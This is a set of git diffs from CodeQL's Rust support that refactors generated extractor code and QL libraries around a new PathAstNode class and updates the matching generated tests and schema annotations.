gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | -| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected index 0c07d081720..34f30ed8ae1 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected @@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | -| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | -| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | +| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | +| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | +| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql new file mode 100644 index 00000000000..144302946a9 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from TupleStructPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedCrateOrigin() diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql new file mode 100644 index 00000000000..561c303d968 --- /dev/null +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql @@ -0,0 +1,7 @@ +// generated by codegen, do not edit +import codeql.rust.elements +import TestUtils + +from TupleStructPat x +where toBeTested(x) and not x.isUnknown() +select x, x.getResolvedPath() diff --git a/rust/schema/annotations.py b/rust/schema/annotations.py index b0d7296dbad..05a163de9bf 100644 --- a/rust/schema/annotations.py +++ b/rust/schema/annotations.py @@ -76,7 +76,7 @@ class _: ``` """ -@annotate(Path, replace_bases={AstNode: Resolvable}) +@annotate(Path) class _: """ A path. For example: @@ -114,7 +114,7 @@ class _: """ -class PathExprBase(Expr): +class PathExprBase(Expr, Resolvable): """ A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. """ @@ -412,7 +412,7 @@ class _: """ -@annotate(RecordExpr, cfg = True) +@annotate(RecordExpr, add_bases=(Resolvable,), cfg = True) class _: """ A record expression. For example: @@ -682,7 +682,7 @@ class _: """ -@annotate(RecordPat, cfg = True) +@annotate(RecordPat, add_bases=(Resolvable,), cfg = True) class _: """ A record pattern. For example: @@ -723,7 +723,7 @@ class _: """ -@annotate(PathPat, cfg = True) +@annotate(PathPat, add_bases=(Resolvable,), cfg = True) @qltest.test_with(Path) class _: """ @@ -769,7 +769,7 @@ class _: """ -@annotate(TupleStructPat, cfg = True) +@annotate(TupleStructPat, add_bases=(Resolvable,), cfg = True) class _: """ A tuple struct pattern. For example: diff --git a/rust/schema/prelude.py b/rust/schema/prelude.py index ffd65959b5a..9b9858be6a5 100644 --- a/rust/schema/prelude.py +++ b/rust/schema/prelude.py @@ -89,7 +89,7 @@ class Addressable(AstNode): class Resolvable(AstNode): """ - Either a `Path`, or a `MethodCallExpr`. + Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. """ resolved_path: optional[string] | rust.detach | ql.internal resolved_crate_origin: optional[string] | rust.detach | ql.internal From c46f44da5f17a6b14a36d47c978780d94e942b19 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 29 Nov 2024 15:55:51 +0100 Subject: [PATCH 0767/1267] Rust: fix QL compilation errors --- rust/extractor/src/generated/.generated.list | 2 +- rust/extractor/src/generated/top.rs | 675 ++++++++++-------- rust/ql/.generated.list | 49 +- rust/ql/.gitattributes | 5 +- .../internal/generated/CfgNodes.qll | 50 -- .../rust/dataflow/internal/DataFlowImpl.qll | 30 +- rust/ql/lib/codeql/rust/elements.qll | 1 + .../lib/codeql/rust/elements/PathAstNode.qll | 13 + rust/ql/lib/codeql/rust/elements/PathExpr.qll | 2 +- .../lib/codeql/rust/elements/PathExprBase.qll | 1 - rust/ql/lib/codeql/rust/elements/PathPat.qll | 3 +- .../lib/codeql/rust/elements/RecordExpr.qll | 3 +- .../ql/lib/codeql/rust/elements/RecordPat.qll | 3 +- .../lib/codeql/rust/elements/Resolvable.qll | 2 +- .../codeql/rust/elements/TupleStructPat.qll | 3 +- .../elements/internal/PathAstNodeImpl.qll | 19 + .../rust/elements/internal/ResolvableImpl.qll | 2 +- .../internal/generated/ParentChild.qll | 231 +++--- .../internal/generated/PathAstNode.qll | 36 + .../elements/internal/generated/PathExpr.qll | 19 +- .../internal/generated/PathExprBase.qll | 3 +- .../elements/internal/generated/PathPat.qll | 17 +- .../rust/elements/internal/generated/Raw.qll | 178 +++-- .../internal/generated/RecordExpr.qll | 18 +- .../elements/internal/generated/RecordPat.qll | 18 +- .../internal/generated/Resolvable.qll | 2 +- .../elements/internal/generated/Synth.qll | 60 +- .../internal/generated/TupleStructPat.qll | 20 +- .../ql/lib/codeql/rust/frameworks/Reqwest.qll | 5 +- .../lib/codeql/rust/frameworks/stdlib/Env.qll | 6 +- rust/ql/lib/rust.dbscheme | 114 ++- .../security/CWE-696/BadCtorInitialization.ql | 2 +- .../FormatTemplateVariableAccess.expected | 10 +- .../FormatTemplateVariableAccess.ql | 12 +- ...ableAccess_getResolvedCrateOrigin.expected | 0 ...teVariableAccess_getResolvedCrateOrigin.ql | 7 - ...ateVariableAccess_getResolvedPath.expected | 0 ...tTemplateVariableAccess_getResolvedPath.ql | 7 - .../generated/Path/PathExpr.expected | 12 +- .../generated/Path/PathExpr.ql | 10 +- .../TupleStructPat/TupleStructPat.expected | 6 +- .../TupleStructPat/TupleStructPat.ql | 10 +- .../dataflow/sources/InlineFlow.ql | 6 +- rust/schema/annotations.py | 17 +- rust/schema/prelude.py | 9 +- 45 files changed, 855 insertions(+), 843 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/elements/PathAstNode.qll create mode 100644 rust/ql/lib/codeql/rust/elements/internal/PathAstNodeImpl.qll create mode 100644 rust/ql/lib/codeql/rust/elements/internal/generated/PathAstNode.qll delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected delete mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql diff --git a/rust/extractor/src/generated/.generated.list b/rust/extractor/src/generated/.generated.list index 8ca2c6931b1..cb1f2ee7ca5 100644 --- a/rust/extractor/src/generated/.generated.list +++ b/rust/extractor/src/generated/.generated.list @@ -1,2 +1,2 @@ mod.rs 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 -top.rs 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 +top.rs 4b7dc25409974b210c908c4a15d5b69d242c07305e6e78c9dfe0fa434c22e2bd 4b7dc25409974b210c908c4a15d5b69d242c07305e6e78c9dfe0fa434c22e2bd diff --git a/rust/extractor/src/generated/top.rs b/rust/extractor/src/generated/top.rs index 8cdec4c9b9f..3a1fc7bea67 100644 --- a/rust/extractor/src/generated/top.rs +++ b/rust/extractor/src/generated/top.rs @@ -6055,6 +6055,51 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct PathAstNode { + _unused: () +} + +impl trap::TrapClass for PathAstNode { + fn class_name() -> &'static str { "PathAstNode" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathAstNode is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathExprBase { _unused: () @@ -6100,83 +6145,6 @@ impl From> for trap::Label { } } -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathExprBase is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -#[derive(Debug)] -pub struct PathPat { - pub id: trap::TrapId, - pub path: Option>, -} - -impl trap::TrapEntry for PathPat { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("path_pats", vec![id.into()]); - if let Some(v) = self.path { - out.add_tuple("path_pat_paths", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for PathPat { - fn class_name() -> &'static str { "PathPat" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Pat - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct PathType { pub id: trap::TrapId, @@ -6508,78 +6476,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct RecordExpr { - pub id: trap::TrapId, - pub path: Option>, - pub record_expr_field_list: Option>, -} - -impl trap::TrapEntry for RecordExpr { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("record_exprs", vec![id.into()]); - if let Some(v) = self.path { - out.add_tuple("record_expr_paths", vec![id.into(), v.into()]); - } - if let Some(v) = self.record_expr_field_list { - out.add_tuple("record_expr_record_expr_field_lists", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for RecordExpr { - fn class_name() -> &'static str { "RecordExpr" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Expr - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct RecordFieldList { pub id: trap::TrapId, @@ -6639,78 +6535,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct RecordPat { - pub id: trap::TrapId, - pub path: Option>, - pub record_pat_field_list: Option>, -} - -impl trap::TrapEntry for RecordPat { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("record_pats", vec![id.into()]); - if let Some(v) = self.path { - out.add_tuple("record_pat_paths", vec![id.into(), v.into()]); - } - if let Some(v) = self.record_pat_field_list { - out.add_tuple("record_pat_record_pat_field_lists", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for RecordPat { - fn class_name() -> &'static str { "RecordPat" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Pat - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct RefExpr { pub id: trap::TrapId, @@ -7475,78 +7299,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct TupleStructPat { - pub id: trap::TrapId, - pub fields: Vec>, - pub path: Option>, -} - -impl trap::TrapEntry for TupleStructPat { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("tuple_struct_pats", vec![id.into()]); - for (i, v) in self.fields.into_iter().enumerate() { - out.add_tuple("tuple_struct_pat_fields", vec![id.into(), i.into(), v.into()]); - } - if let Some(v) = self.path { - out.add_tuple("tuple_struct_pat_paths", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for TupleStructPat { - fn class_name() -> &'static str { "TupleStructPat" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Pat - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct TupleType { pub id: trap::TrapId, @@ -9411,8 +9163,8 @@ impl From> for trap::Label { #[derive(Debug)] pub struct PathExpr { pub id: trap::TrapId, - pub attrs: Vec>, pub path: Option>, + pub attrs: Vec>, } impl trap::TrapEntry for PathExpr { @@ -9422,12 +9174,12 @@ impl trap::TrapEntry for PathExpr { fn emit(self, id: trap::Label, out: &mut trap::Writer) { out.add_tuple("path_exprs", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } for (i, v) in self.attrs.into_iter().enumerate() { out.add_tuple("path_expr_attrs", vec![id.into(), i.into(), v.into()]); } - if let Some(v) = self.path { - out.add_tuple("path_expr_paths", vec![id.into(), v.into()]); - } } } @@ -9471,6 +9223,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathExpr is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + impl From> for trap::Label { fn from(value: trap::Label) -> Self { // SAFETY: this is safe because in the dbscheme PathExpr is a subclass of PathExprBase @@ -9489,6 +9250,245 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct PathPat { + pub id: trap::TrapId, + pub path: Option>, +} + +impl trap::TrapEntry for PathPat { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("path_pats", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for PathPat { + fn class_name() -> &'static str { "PathPat" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Pat + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +#[derive(Debug)] +pub struct RecordExpr { + pub id: trap::TrapId, + pub path: Option>, + pub record_expr_field_list: Option>, +} + +impl trap::TrapEntry for RecordExpr { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("record_exprs", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + if let Some(v) = self.record_expr_field_list { + out.add_tuple("record_expr_record_expr_field_lists", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for RecordExpr { + fn class_name() -> &'static str { "RecordExpr" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Expr + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +#[derive(Debug)] +pub struct RecordPat { + pub id: trap::TrapId, + pub path: Option>, + pub record_pat_field_list: Option>, +} + +impl trap::TrapEntry for RecordPat { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("record_pats", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + if let Some(v) = self.record_pat_field_list { + out.add_tuple("record_pat_record_pat_field_lists", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for RecordPat { + fn class_name() -> &'static str { "RecordPat" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Pat + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct Static { pub id: trap::TrapId, @@ -9902,6 +9902,87 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct TupleStructPat { + pub id: trap::TrapId, + pub path: Option>, + pub fields: Vec>, +} + +impl trap::TrapEntry for TupleStructPat { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("tuple_struct_pats", vec![id.into()]); + if let Some(v) = self.path { + out.add_tuple("path_ast_node_paths", vec![id.into(), v.into()]); + } + for (i, v) in self.fields.into_iter().enumerate() { + out.add_tuple("tuple_struct_pat_fields", vec![id.into(), i.into(), v.into()]); + } + } +} + +impl trap::TrapClass for TupleStructPat { + fn class_name() -> &'static str { "TupleStructPat" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Pat + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of PathAstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct TypeAlias { pub id: trap::TrapId, diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index dff9541b449..b5427026044 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -1,4 +1,4 @@ -lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll a8e083c7d8c4dea6459c5e128e2123f5cf8fd14c076f2256ebda508c13d553cd 16fcc0d34097b0b37a0041281515ca028d2702eec6d9c1d03c39a1158883bdef +lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll 7411cdfc2c93ad1e70afd41edb6ba098e2bc9db77213850936a48d07b9f716c4 f2dd71fd4fd8a98681f1d931d04b28a01d6eb3987ab56aa4425e2c57316c81f6 lib/codeql/rust/elements/Abi.qll 4c973d28b6d628f5959d1f1cc793704572fd0acaae9a97dfce82ff9d73f73476 250f68350180af080f904cd34cb2af481c5c688dc93edf7365fd0ae99855e893 lib/codeql/rust/elements/Addressable.qll 13011bfd2e1556694c3d440cc34af8527da4df49ad92b62f2939d3699ff2cea5 ddb25935f7553a1a384b1abe2e4b4fa90ab50b952dadec32fd867afcb054f4be lib/codeql/rust/elements/ArgList.qll 661f5100f5d3ef8351452d9058b663a2a5c720eea8cf11bedd628969741486a2 28e424aac01a90fb58cd6f9f83c7e4cf379eea39e636bc0ba07efc818be71c71 @@ -102,28 +102,29 @@ lib/codeql/rust/elements/ParenPat.qll 40d033de6c85ad042223e0da80479adebab3549439 lib/codeql/rust/elements/ParenType.qll e1f5695b143c97b98ccdb460a5cf872461cfc13b83a4f005f26c288dc0afae10 1164f8efae7f255925411bddb33939fab0bf1c07955a16fef173b3f4675d09ae lib/codeql/rust/elements/Pat.qll 56211c5cb4709e7c12a2bfd2da5e413a451672d99e23a8386c08ad0b999fd45c b1b1893a13a75c4f0390f7e2a14ee98a46f067cfdc991a8d43adc82497d20aff lib/codeql/rust/elements/Path.qll 16264a9c978a3027f623530e386a9ad16541305b252fed5e1bedcfbe1d6475d5 8c21063c7f344ce686342e7c12542fec05004e364681f7a31b65f5ee9263a46d -lib/codeql/rust/elements/PathExpr.qll 906df1d80c662b79f1b0b0428c39754b7f8dbcb2234919dd45dd8206a099dd36 1d6015afab6378c926c5838c9a5772cfcfeedf474e2eeca3e46085300ff8d4e1 -lib/codeql/rust/elements/PathExprBase.qll db8702a2e2cec7c1daaad38649c27b657759103ca451dfa9d34b9be873fdc0af d770e983fb55e06f3fcee6b7511cf5d4ed4c4f6a18d8b1d1f14553cdbe8666df -lib/codeql/rust/elements/PathPat.qll 9d0b29b964bfe3a90af4c9930868a3d2046d2210a1575f9b9af84f6fd3fccbab 